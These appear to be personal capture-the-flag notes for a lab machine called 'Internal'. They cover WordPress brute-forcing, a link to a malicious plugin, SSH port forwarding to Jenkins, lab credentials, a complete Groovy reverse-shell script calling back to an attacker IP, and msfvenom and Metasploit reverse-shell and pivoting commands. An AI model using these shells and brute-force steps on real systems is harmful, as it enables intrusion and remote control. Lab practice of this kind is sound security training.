Internal

only ports 22,80. reveal wordpress blog

private post

set up a portfoward and brute force the jenkins login

// find only admin user
// brute force wp-admin
// 
wpscan --url=http://internal.thm/blog --passwords /home/kali/htb/rockyou.txt

// find password
// login to wp-admin with creds and install malicious plugin (rev shell)
https://github.com/wetw0rk/malicious-wordpress-plugin

ssh -L 8000:172.17.0.1:8080 user@10.10.221.230 -fN


Will's credentials. william:arnold147
aubreanna:bubb13guM!@#123

// code for groovy script / rev shell
// https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6

String host="10.9.47.64";
int port=5555;
String cmd="bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

// random notes
172.16.20.0/24

python3 -c 'import pty; pty.spawn("/bin/bash")'

msf> use auxiliary/server/socks_proxy
set SRVPORT 1080

msfvenom -p linux/x64/shell/reverse_tcp LHOST=10.9.47.64 LPORT=4448 -f elf-so -o shell-x64

use multi/handler
set LPORT 4449
portfwd add -R -L 10.9.47.64 -l 4444 -p 4445

use exploit/multi/script/web_delivery
set target PHP
set payload payload/php/meterpreter_reverse_tcp
set LHOST tun0
sessions 1

meterpreter>